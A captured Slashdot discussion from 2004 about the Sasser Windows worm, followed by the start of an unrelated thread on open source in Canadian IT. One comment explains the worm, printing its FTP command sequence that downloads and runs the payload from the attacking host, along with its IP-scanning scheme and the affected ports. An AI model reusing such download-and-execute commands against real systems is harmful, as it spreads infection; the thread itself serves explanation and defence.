by skinfitz (564041) on Saturday May 01, @02:03PM (#9028549)
(http://www.mywebsitelinks.com/ | Last Journal: Monday December 22, @02:52PM)
Well look on the bright side - worms and viruses are the only things that you have less of than games.
[ Reply to This | Parent ]
o Re:Dang... by jo_ham (Score:2) Saturday May 01, @05:59PM
o 2 replies beneath your current threshold.
* 1 reply beneath your current threshold.

Security Update Dates (Score:5, Insightful)
by TheUnFounded (731123) on Saturday May 01, @01:50PM (#9028435)
You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
[ Reply to This ]

Re:Security Update Dates (Score:5, Insightful)
by Unknown Relic (544714) on Saturday May 01, @02:25PM (#9028723)
Is that reduced timeline maybe an example of what this /. article [slashdot.org] from a couple months ago was talking about? Essentially it stated that a lot of the new worms are actually being caused by the reverse engineering of patches to easily find exploits. Some machines will of course be patched, but as we all know, a huge number of machines will remain unpatched and vulnerable for months to come. If this is the case, Microsoft can hardly be faulted for getting the patch out only a few days before the exploit, since it's the patch itself that potentially prompted its creation. The really interesting thing is that if this is the case and Microsoft is actually increasing their security efforts and releasing more patches, we could actually see more worms released targetting unpatched systems. For them, this really isn't a good situation to be in - the more they do correct problems with their operating systems, the more exploits hit the unpatched machines, making it look like their enhanced focus on security is a joke.
[ Reply to This | Parent ]
o Recurring theme: Release of patch causes exploit by David Hume (Score:2) Saturday May 01, @05:44PM
* Re:Security Update Dates by blowdart (Score:1) Saturday May 01, @02:28PM
* Re:Security Update Dates by insecuritiez (Score:3) Saturday May 01, @02:37PM
o Re:Security Update Dates by TheUnFounded (Score:1) Saturday May 01, @10:02PM
+ Re:Security Update Dates by insecuritiez (Score:2) Saturday May 01, @10:31PM
* Re:Security Update Dates by mrneutron (Score:2) Saturday May 01, @02:48PM
o Re:Security Update Dates by Jugalator (Score:2) Saturday May 01, @04:15PM
+ Re:Security Update Dates by Knightmare (Score:2) Saturday May 01, @07:53PM
* 1 reply beneath your current threshold.

YA Windows-only software title (Score:5, Funny)
by Anonymous Coward on Saturday May 01, @01:51PM (#9028441)
In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
[ Reply to This ]

* Re:YA Windows-only software title by jtev (Score:1) Saturday May 01, @02:51PM
* 1 reply beneath your current threshold.

# Why use windows update? by BlankTim (Score:1) Saturday May 01, @01:52PM

* Re:Why use windows update? by kyhwana (Score:3) Saturday May 01, @02:03PM
o Re:Why use windows update? by gnu-generation-one (Score:2) Saturday May 01, @02:58PM
+ Well yeah.... by C0rinthian (Score:2) Saturday May 01, @04:08PM

# Where's Panda? by RazorX90 (Score:2) Saturday May 01, @01:54PM

* Re:Where's Panda? by LordK3nn3th (Score:2) Saturday May 01, @02:17PM

Loose not lose (Score:5, Funny)
by Brian Dennehy (698379) on Saturday May 01, @01:54PM (#9028466)
(http://www.mindsprin...ue/briandennehy.html)
I'm impressed that they got the headline right!
[ Reply to This ]

* Re:Loose not lose by empaler (Score:1) Saturday May 01, @02:20PM
o 1 reply beneath your current threshold.
* 3 replies beneath your current threshold.

Same old, same old.... (Score:5, Insightful)
by gnuman99 (746007) on Saturday May 01, @01:55PM (#9028479)
Same old news about another worm. Nothing to see here, move along.

Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.
[ Reply to This ]

* Re:Same old, same old.... by Anonymous Coward (Score:2) Saturday May 01, @02:14PM
* Re:Same old, same old.... by 3) profit!!! (Score:1) Saturday May 01, @05:35PM
* 2 replies beneath your current threshold.

How it works (Score:5, Informative)
by mrneutron (61365) * on Saturday May 01, @01:57PM (#9028493)
It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

# open XXX.XXX.XXX.XXX 5554
# anonymous
# user
# bin
# get XXXXX_up.exe
# bye
# XXXXX_up.exe

If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

The IP addresses generated by the worm are distributed as follows:

# 50% are completely random
# 25% have the same first octet as the IP
# address of the infected host
# 25% have the same first and second octet as the IP address of the infected host.

The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

See:

http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html

[ Reply to This ]

* Unoptimized algoritm... by Henk Poley (Score:2) Saturday May 01, @02:05PM
* Bad Link...Here's the Correct One by Sangloth (Score:3) Saturday May 01, @02:10PM
* Re:How it works by sootman (Score:2) Saturday May 01, @07:01PM
* 2 replies beneath your current threshold.

Dammit... (Score:4, Interesting)
by Saint Aardvark (159009) * on Saturday May 01, @01:58PM (#9028503)
(http://www.saintaardvarkthecarpeted.com/ | Last Journal: Friday April 30, @10:29AM)
I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
[ Reply to This ]

Re:Dammit... (Score:5, Interesting)
by Nonesuch (90847) <`nonesuch' `at' `msg.net'> on Saturday May 01, @03:40PM (#9029259)
(Last Journal: Friday September 14, @01:46PM)

want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...

LaBrea runs on FreeBSD too.

I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.

The Sasser worm starts 128 scanning threads to pseuod-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.
[ Reply to This | Parent ]
o Re:Dammit... by Saint Aardvark (Score:2) Saturday May 01, @03:48PM
o Re:Dammit... by Saint Aardvark (Score:2) Saturday May 01, @08:17PM
* Re:Dammit... by ThisIsFred (Score:2) Saturday May 01, @07:02PM
o Re:Dammit... by ThisIsFred (Score:2) Saturday May 01, @07:05PM

# This is news? by bcmm (Score:1) Saturday May 01, @01:58PM

# Shocking! by focitrixilous P (Score:1) Saturday May 01, @01:59PM

# This close to removing win2k... by brendanoconnor (Score:3) Saturday May 01, @02:00PM

* Re:This close to removing win2k... by nazsco (Score:1) Saturday May 01, @02:06PM
o Re:This close to removing win2k... by squall14716 (Score:1) Saturday May 01, @02:19PM
o Re:This close to removing win2k... by brendanoconnor (Score:1) Saturday May 01, @02:21PM
+ European Air War by tqft (Score:2) Saturday May 01, @05:31PM
* Re:This close to removing win2k... by Politburo (Score:2) Saturday May 01, @02:32PM
o Re:This close to removing win2k... by blincoln (Score:2) Saturday May 01, @03:07PM
+ 1 reply beneath your current threshold.
* Re:This close to removing win2k... by imroy (Score:2) Saturday May 01, @03:57PM
* 2 replies beneath your current threshold.

Help the poor bastards (Score:5, Funny)
by nazsco (695026) on Saturday May 01, @02:02PM (#9028535)
(Last Journal: Thursday February 12, @03:06PM)
The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.
[ Reply to This ]

* Re:Help the poor bastards by insecuritiez (Score:2) Saturday May 01, @02:40PM

# Oh the irony by BillLeeLee (Score:1) Saturday May 01, @02:02PM

* Re:Oh the irony by Saint Aardvark (Score:2) Saturday May 01, @02:12PM
* Re:Oh the irony by NuclearDog (Score:2) Saturday May 01, @02:20PM
o Re:Oh the irony by BillLeeLee (Score:2) Saturday May 01, @02:24PM
o 1 reply beneath your current threshold.

Days like this... (Score:5, Funny)
by C0rinthian (770164) on Saturday May 01, @02:04PM (#9028554)
I REALLY hate working dial-up tech support.
(ring)
sigh....
[ Reply to This ]

* Re:Days like this... by Saint Aardvark (Score:2) Saturday May 01, @02:10PM
* 2 replies beneath your current threshold.

some important points (Score:4, Informative)
by R_V_Winkle (186128) on Saturday May 01, @02:07PM (#9028578)
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

Sasser generates traffic on TCP ports 445, 5554 and 9996.

The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

http://www.microsoft.com/technet/security/bulletin /MS04-011.mspx
[ Reply to This ]

Windows update freaking out! (Score:5, Funny)
by nazsco (695026) on Saturday May 01, @02:12PM (#9028616)
(Last Journal: Thursday February 12, @03:06PM)
after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...

and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."

Ok, so i contact myself, and wonders what the hell?!?

I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!

but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.
[ Reply to This ]

Re:Windows update freaking out! (Score:4, Funny)
by NuclearDog (775495) on Saturday May 01, @02:22PM (#9028704)
(http://nucleardog.com/)
That always annoyed the hell out of me.

"That action can not be performed. Please contact your system administrator."

I always felt like and idiot talking to myself...
[ Reply to This | Parent ]
o Re:Windows update freaking out! by nazsco (Score:1) Saturday May 01, @03:31PM
o "Please contact your system administrator." by seibed (Score:1) Sunday May 02, @02:35AM
o 1 reply beneath your current threshold.
* Re:Windows update freaking out! by LiquidCoooled (Score:1) Saturday May 01, @03:18PM
Re:Windows update freaking out! (Score:4, Informative)
by Jarnis (266190) on Saturday May 01, @05:52PM (#9030088)
Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...
[ Reply to This | Parent ]
* 1 reply beneath your current threshold.

# That's funny. by LordK3nn3th (Score:3) Saturday May 01, @02:15PM

* Re:That's funny. by dtfinch (Score:2) Saturday May 01, @02:33PM
o Re:That's funny. by Homology (Score:2) Saturday May 01, @03:12PM
o Re:That's funny. by kasperd (Score:2) Saturday May 01, @03:21PM
* Re:That's funny. by dyefade (Score:1) Saturday May 01, @02:58PM
o Why wonder? by khasim (Score:2) Saturday May 01, @05:15PM
* Re:That's funny. by slashtom.org (Score:1) Saturday May 01, @04:07PM
o Re:That's funny. by mckyj57 (Score:1) Sunday May 02, @01:17AM
* Re:That's funny. by logical1010 (Score:2) Saturday May 01, @04:22PM
* Social engineering by YrWrstNtmr (Score:3) Saturday May 01, @06:18PM
* 2 replies beneath your current threshold.

Well done, submitter! (Score:5, Funny)
by 6Yankee (597075) on Saturday May 01, @02:15PM (#9028643)

How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

Of course, then came the comments... :-)
[ Reply to This ]

* Re:Well done, submitter! by Dynamoo (Score:2) Saturday May 01, @07:58PM
* 1 reply beneath your current threshold.

# but surely by Anonymous Coward (Score:1) Saturday May 01, @02:17PM

I was wondering... (Score:5, Funny)
by lazy_arabica (750133) on Saturday May 01, @02:17PM (#9028662)
... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!

Well... That's just a little... repetitive ;-)
[ Reply to This ]

* Re:I was wondering... by e.colli (Score:1) Saturday May 01, @02:39PM
* Re:I was wondering... by Tim Ward (Score:2) Saturday May 01, @02:43PM
Re:I was wondering... (Score:5, Interesting)
by kasperd (592156) on Saturday May 01, @03:25PM (#9029160)
(http://kasperd.lir.dk/)
a firewall is essential.

It sure is. The last worm [securityfocus.com] wouldn't have worked without one.
[ Reply to This | Parent ]
* Re:I was wondering... by $anchez (Score:1) Saturday May 01, @10:51PM
o Re:I was wondering... by kasperd (Score:1) Sunday May 02, @03:54AM

# Windows XP SP1 Fixed This! by Dave419 (Score:2) Saturday May 01, @02:21PM

* Re:Windows XP SP1 Fixed This! by RoadkillBunny (Score:1) Saturday May 01, @03:06PM
Re:Windows XP SP1 Fixed This! (Score:4, Informative)
by blincoln (592401) on Saturday May 01, @03:13PM (#9029081)
(Last Journal: Monday March 22, @12:14AM)
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1.

Uh... what?

Buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code by causing long debug entries to be generated for the DCPROMO.LOG log file. [mitre.org] (emphasis mine)
[ Reply to This | Parent ]
o Re:Windows XP SP1 Fixed This! by Jugalator (Score:2) Saturday May 01, @04:09PM
+ Re:Windows XP SP1 Fixed This! by blincoln (Score:2) Saturday May 01, @04:44PM
* Re:Windows XP SP1 Fixed This! by EvilGrin666 (Score:1) Saturday May 01, @04:39PM
* Re:Windows XP SP1 Fixed This! by boxless (Score:1) Saturday May 01, @04:40PM
* 2 replies beneath your current threshold.

# Working at PC Club by donkeyoverlord (Score:3) Saturday May 01, @02:21PM

This totally sucks. (Score:5, Interesting)
by mark-t (151149) <(ac.cb.xnyl) (ta) (tkram)> on Saturday May 01, @02:27PM (#9028736)
(Last Journal: Thursday June 19, @05:25PM)
I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my lan when nobody was using any computers... A quick check with ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
[ Reply to This ]

* Re:This totally sucks. by whovian (Score:1) Saturday May 01, @05:02PM
* Re:your ISP was right by mark-t (Score:2) Saturday May 01, @06:18PM
* 3 replies beneath your current threshold.

I use the best anti virus on the market! (Score:4, Insightful)
by rspress (623984) on Saturday May 01, @02:29PM (#9028751)
(http://rspress.home.comcast.net/)
I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
[ Reply to This ]

* Re:I use the best anti virus on the market! by squall14716 (Score:1) Saturday May 01, @10:10PM
o Re:I use the best anti virus on the market! by rspress (Score:2) Saturday May 01, @10:48PM
* 1 reply beneath your current threshold.

# Internet Storm Center by thedillybar (Score:2) Saturday May 01, @02:37PM

Outside the firewall... (Score:5, Interesting)
by BJZQ8 (644168) on Saturday May 01, @02:41PM (#9028837)
(Last Journal: Saturday December 20, @04:39PM)
I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
[ Reply to This ]

* Re:Outside the firewall... by name773 (Score:1) Saturday May 01, @03:45PM
* Re:Outside the firewall... by ProudClod (Score:2) Saturday May 01, @04:33PM
o Re:Outside the firewall... by name773 (Score:1) Saturday May 01, @05:04PM
* check state ethics laws by zogger (Score:1) Saturday May 01, @07:19PM
* Re:Outside the firewall... by zardie (Score:2) Sunday May 02, @12:17AM

# Not Spreading by Sonicated (Score:1) Saturday May 01, @02:42PM

# windows users never fail to amaze me. by Anonymous Coward (Score:2) Saturday May 01, @02:43PM

Re:windows users never fail to amaze me. (Score:4, Insightful)
by Nevo (690791) on Saturday May 01, @04:47PM (#9029695)
Actually, this particular attack cannot be mitigated by running as admin.

It attacks a genuine hole in the operating system and is not dependent on anyone even being logged on to the machine at all. It 'hijacks' the LSASS process, wich runs in the SYSTEM context. The operating system could not run if LSASS wasn't running as SYSTEM.

Of course, the patch has been available for >2 weeks now, so all of this *should* be moot.
[ Reply to This | Parent ]
o Re:windows users never fail to amaze me. by zardie (Score:2) Sunday May 02, @03:54AM
o 1 reply beneath your current threshold.
* Re:windows users never fail to amaze me. by Mad Bad Rabbit (Score:2) Saturday May 01, @05:01PM

# Stop the code rehash by Gary Destruction (Score:2) Saturday May 01, @02:46PM

* Re:Stop the code rehash by blincoln (Score:2) Saturday May 01, @03:15PM
o Re:Stop the code rehash by Gary Destruction (Score:2) Sunday May 02, @02:01AM
* Since you're at it... by tinkerton (Score:1) Saturday May 01, @04:01PM
* 1 reply beneath your current threshold.

# If you wonder what a virus is : by chrysalis (Score:3) Saturday May 01, @02:49PM

# Windows is a joke, but hey, smile. by t_allardyce (Score:1) Saturday May 01, @02:49PM

* Re:Windows is a joke, but hey, smile. by TeddyR (Score:3) Saturday May 01, @03:04PM
o Re:Windows is a joke, but hey, smile. by t_allardyce (Score:1) Saturday May 01, @03:17PM

# mmm....firewall by hillg3 (Score:1) Saturday May 01, @02:51PM

# I got it today! by thegsusfreek (Score:2) Saturday May 01, @02:52PM

# Terminology by tritone (Score:2) Saturday May 01, @02:55PM

# Fine. by JoeBaldwin (Score:1) Saturday May 01, @03:10PM

# if it blocks your favorite removal/anti-virus site by Xiph (Score:2) Saturday May 01, @03:15PM

# bwhahaha ! by freaks (Score:2) Saturday May 01, @03:16PM

Obligatory quote from Linux/*BSD/Mac users (Score:5, Funny)
by imnoteddy (568836) on Saturday May 01, @03:22PM (#9029138)
"Ha Ha!"
Nelson, various Simpsons episodes
[ Reply to This ]

* Re:Obligatory quote from Linux/*BSD/Mac users by Microlith (Score:1) Saturday May 01, @07:09PM

# Synchronicity by Omestes (Score:2) Saturday May 01, @03:23PM

# Anyone else notice? by Pranjal (Score:2) Saturday May 01, @03:48PM

# Sasser et al by Cavelier (Score:1) Saturday May 01, @03:49PM

* Re:Sasser et al by insecuritiez (Score:2) Saturday May 01, @10:36PM

# classic behaviour? by Nightreaver (Score:1) Saturday May 01, @03:55PM

# so thats why my /var/log/messages is so big today by Indy1 (Score:3) Saturday May 01, @03:59PM

# Wow! Bushfire! by reignbow (Score:3) Saturday May 01, @04:29PM

# New Windows Worm on the Loose by Peale (Score:3) Saturday May 01, @04:31PM

# Can't resist by wwvuillemot (Score:1) Saturday May 01, @04:45PM

goodbye windows update (Score:5, Funny)
by sir_cello (634395) on Saturday May 01, @04:45PM (#9029685)

Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.

[ Reply to This ]

* Re:goodbye windows update by smeenz (Score:3) Saturday May 01, @08:51PM
* 1 reply beneath your current threshold.

# Why is it that....!? by Amon CMB (Score:1) Saturday May 01, @04:52PM

# notice to customers by Anonymous Coward (Score:2) Saturday May 01, @05:12PM

* Re:notice to customers by ThisIsFred (Score:2) Saturday May 01, @07:40PM
o 1 reply beneath your current threshold.

Patching / Firewalls (Score:5, Insightful)
by gorfie (700458) on Saturday May 01, @05:16PM (#9029859)
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".

Running something other than Windows is not a good reason to ignore security.
[ Reply to This ]

* Re:Patching / Firewalls by MeNeXT (Score:2) Saturday May 01, @07:39PM
o Re:Patching / Firewalls by toast0 (Score:3) Saturday May 01, @08:57PM

Grounded (Score:4, Interesting)
by krray (605395) * on Saturday May 01, @05:25PM (#9029924)
And in other news ... Delta flights grounded today due to "a computer glitch"

I have to wonder...
[ Reply to This ]

* Re:Grounded by /dev/trash (Score:3) Saturday May 01, @07:07PM
o Re:Grounded by Anonymous Coward (Score:1) Saturday May 01, @07:50PM
+ 1 reply beneath your current threshold.
* 1 reply beneath your current threshold.

# Of course I have a firewall! by Kelz (Score:1) Saturday May 01, @05:27PM

# Firewalls by jesser (Score:2) Saturday May 01, @06:52PM

# Heh by TheSpoom (Score:3) Saturday May 01, @06:59PM

# I don't see how this is news... by The Master Control P (Score:2) Saturday May 01, @09:27PM

# Ah, cruel fate.... by GrnArmadillo (Score:1) Saturday May 01, @10:29PM

# my mom had this today... by Chuck Bucket (Score:1) Sunday May 02, @12:14AM

# SP2 beta users cannot patch!! by zardie (Score:2) Sunday May 02, @12:15AM

# left out again by dolson (Score:2) Sunday May 02, @01:15AM

# Sasser by rush22 (Score:2) Sunday May 02, @02:37AM

# The Culprit! by Lord Custos (Score:1) Sunday May 02, @03:03AM

* Re:The Culprit! by Lord Custos (Score:1) Sunday May 02, @03:09AM

You must be an american (Score:4, Funny)
by empaler (130732) on Saturday May 01, @02:14PM (#9028630)
Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.
[ Reply to This | Parent ]

* Re:You must be an american by squall14716 (Score:1) Saturday May 01, @02:27PM
o Amazing by empaler (Score:1) Saturday May 01, @04:39PM
* Re:You must be an american by Gothmolly (Score:1) Saturday May 01, @03:23PM
* 1 reply beneath your current threshold.

# Re:But... it does! by The Evil Couch (Score:2) Saturday May 01, @02:22PM

* Smelly by ConsoleDeamon (Score:1) Saturday May 01, @02:43PM

# Re:Goodness? by kfg (Score:1) Saturday May 01, @02:37PM

* Re:Goodness? by SkunkPussy (Score:1) Saturday May 01, @02:56PM
o 1 reply beneath your current threshold.

# Re:already feeling it on college campuses by ajs318 (Score:2) Saturday May 01, @02:45PM

* Re:already feeling it on college campuses by rokzy (Score:3) Saturday May 01, @03:24PM
* Re:already feeling it on college campuses by Lehk228 (Score:2) Saturday May 01, @03:33PM
Re:already feeling it on college campuses (Score:4, Insightful)
by Radon Knight (684275) on Saturday May 01, @03:41PM (#9029263)
> If I was in charge of a university's computer systems,
> absolutely no proprietary, closed source software would be
> allowed anywhere on my network, especially not the parts
> accessible to students

So, preventing your students from being unable to run Mathematica, Maple, Matlab, Visual Studio,... is educationally beneficial in what way?

Yes, closed source software has problems. So does open source. An all-out ban either way helps no one and solves nothing.
[ Reply to This | Parent ]
o Re:already feeling it on college campuses by ajs318 (Score:1) Saturday May 01, @03:59PM
+ Re:already feeling it on college campuses by Radon Knight (Score:2) Saturday May 01, @04:09PM
# Re:already feeling it on college campuses by ajs318 (Score:2) Saturday May 01, @04:23PM
+ 1 reply beneath your current threshold.
o Re:already feeling it on college campuses by koekie (Score:1) Sunday May 02, @05:31AM

# Consumers aren't the only ones to blame. by Vandil X (Score:2) Saturday May 01, @02:54PM

# Re:No brainer by RoadkillBunny (Score:2) Saturday May 01, @02:59PM

* Re:No brainer by Jarnis (Score:2) Saturday May 01, @05:57PM

Re:Linux is vunerable too (The anti-anti-windows F (Score:5, Insightful)
by ajs318 (655362) on Saturday May 01, @03:54PM (#9029350)

1. Linux isn't as good as Windows, Windows has more accountability and support.

Microsoft could withdraw support for Windows at any time. Linux has independent support from a community of users.

2. If Linux was used as much as Windows then Viruses would be as common, instead of incredable rare.

Linux is secure by design. Privilege separation, memory protection and so forth. Most distributions force you to create a non-root user at installation time.

3. Windows is cheaper then Linux even though Linux is free. It's a TCO type of thing.

What you mean is that it's cheaper to hire somebody to fix a Windows box than a Linux box. There is a grain of truth in this. Windows often packs up for no appareny reason. Almost any unskilled monkey can "fix" a broken Windows box just by hoicking out the power lead, counting to ten and putting it back. Linux only ever misbehaves with a good reason, and requires someone who knows their arsehole from their earhole to fix it.

4. Gimp sucks compared to Photoshop.

This sounds like an ad hominem attack. At best it's a red herring. Photoshop is an Adobe product, nothing to do with Windows or Linux.

5. Open source is insecure by default. Only by hidding your secrets are they kept safe.

Thou smokest crack. If the security of your code depends on a secret that you hope an attacker will not discover, then as soon as an attacker discovers that secret then your code is insecure. The security of Linux does not depend on one big, centrally-kept secret. Cf. public key encryption.

6. IE is better then Firefox because my kids can play shockwave games on Disney.com

Then try the full version of Mozilla, which definitely supports the Flash player plugin {though I'm not convinced you aren't just lying, Firefox might well support plugins}. If you don't need Flash, but you would like tabbed browsing, pop-up blocking, a Javascript debugging console, cookie management and speed, then Firefox certainly does it.

7. MS has Exchange, Linux doesn't.

Linux has Sendmail. 'Nuff said.

8. OO.org sucks compared the usability of Office

You haven't said how OO.o "sucks", nor even which release you are talking about, so I have to presume you are merely parroting.

9. Linux isn't ready for the Desktop.

You are merely parroting.

10. Grandma can't install Linux.

Awwwwk! Pieces of eight! Polly want a cracker! Grandma can't install Windows either.

11. Can't play Everquest on Linux.

Blame the makers of Everquest, or find another game to play. See also point 4.

12. Users are the problem, Not Microsoft.

Just goes to show ..... if you say enough things then at least one of them might turn out to be true. Many users need to get a clue, I'll agree. But I have to say that writing a mail client which treats unknown file types as "executable" -- and executes them without the user's consent -- sounds seriously like aiding and abetting virus propagation. Yeah, that was years ago. See also point 9.
[ Reply to This | Parent ]

* Re:Linux is vunerable too (The anti-anti-windows F by AnyoneEB (Score:1) Saturday May 01, @09:15PM
* 2 replies beneath your current threshold.

# Re:Who needs a firewall...? by dicepackage (Score:1) Saturday May 01, @05:13PM

# 27 replies beneath your current threshold.   ¶ 3:18 AM

  Open Source Part of Mainstream IT in Canada




Posted by michael on Saturday May 01, @04:00PM
from the value-proposition dept.
Sxip writes "A recent survey of advanced technology companies indicates that Open Source software is becoming an explicit component in enterprise Information Technology (IT) strategy and architecture. Some nine out of ten respondents include Open Source in their planning."



Slashdot Login
Nickname:

Password:

Public Terminal

[ Create a new account ]
Related Links
· Online Business Books
· Compare the best prices on: Software/Business Productivity
· recent survey
· More Linux Business stories
· Also by michael

< Going Back to the Moon and Mars | Engaging Debate on Piracy and Videogaming >
Open Source Part of Mainstream IT in Canada | Log in/Create an Account | Top | 161 comments | Search Discussion
Threshold:
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
Woohoo! (Score:1)
by llamaguy (773335) on Saturday May 01, @04:02PM (#9029398)
Great news - at least some of the larger corporations *coughtakenotebillgatescough* are using open source to its full advantage, even if it's in Canada.
[ Reply to This ]

* 4 replies beneath your current threshold.

Not only include it... (Score:5, Informative)
by nordicfrost (118437) * on Saturday May 01, @04:03PM (#9029409)
....Rely on it. The online edition I work for has just as many Linux boxen as Windows boxen. And only 1/2 of them are serving pages. The only ones using Windows is us journalists and the suits. And we journalists could have done it with Linux as well. Although I prefer to do it (the writing, pervert! ;) with MacOS X
[ Reply to This ]

* Re:Not only include it... by LBArrettAnderson (Score:2) Saturday May 01, @04:22PM
o Re:Not only include it... by mwillis (Score:2) Saturday May 01, @05:02PM
* Re:Not only include it... by MC_Cancer_Pants (Score:1) Saturday May 01, @05:08PM
o Re:Not only include it... by NortWind (Score:1) Saturday May 01, @05:36PM
+ Re:Not only include it... by MC_Cancer_Pants (Score:1) Saturday May 01, @06:04PM
# Re:Not only include it... by zgornz (Score:1) Saturday May 01, @06:15PM
+ Re:Not only include it... by Tony-A (Score:1) Sunday May 02, @03:19AM
# Re:Not only include it... by It'sYerMam (Score:1) Sunday May 02, @04:50AM
+ 1 reply beneath your current threshold.
* Honest question: by Dog and Pony (Score:2) Saturday May 01, @06:16PM
o 1 reply beneath your current threshold.
* Re:Not only include it... by N1KO (Score:1) Saturday May 01, @05:04PM
o 1 reply beneath your current threshold.
* 2 replies beneath your current threshold.

just in case their server doesnt handle it... (Score:2, Informative)
by pigscanfly.ca (664381) on Saturday May 01, @04:04PM (#9029420)
(http://www.pigscanfly.ca/)

The mirror of http://www.cata.ca/Media_and_Events/Press_Releases /cata_pr04210402.html is at http://mirrorit.demonmoo.com/r_130/www.cata.ca/Med ia_and_Events/Press_Releases/cata_pr04210402.html [demonmoo.com]
[ Reply to This ]

9 out of 10? (Score:2, Funny)
by John Starks (763249) on Saturday May 01, @04:05PM (#9029425)
In Canada, when they say 9 out of 10, they mean 9 out of THE 10 developers.
[ Reply to This ]

* Re:9 out of 10? by Kwiik (Score:1) Saturday May 01, @04:30PM
Troll? Flamebait? (Score:5, Funny)
by John Starks (763249) on Saturday May 01, @04:41PM (#9029662)
I guess two of the three Canadian moderators are upset.

There goes the karma.
[ Reply to This | Parent ]
Re:9 out of 10? (Score:5, Informative)
by hey (83763) on Saturday May 01, @05:27PM (#9029936)
(Last Journal: Tuesday March 12, @07:08AM)
Yeah, they work for Corel [corel.com], Alias [alias.com], Hummingbird [hummingbird.com], MKS [mks.com], Cognos [cognos.com], Zero Knowledge [zeroknowledge.com], Blackberry [blackberry.com], Nothern Telecom [nortelnetworks.com] ...
[ Reply to This | Parent ]
o Re:9 out of 10? by Anonymous Coward (Score:3) Saturday May 01, @06:24PM
o Re:9 out of 10? by leoxx (Score:1) Saturday May 01, @06:29PM
o Re:9 out of 10? by Pantheraleo2k3 (Score:1) Saturday May 01, @08:44PM
Re:9 out of 10? (Score:5, Funny)
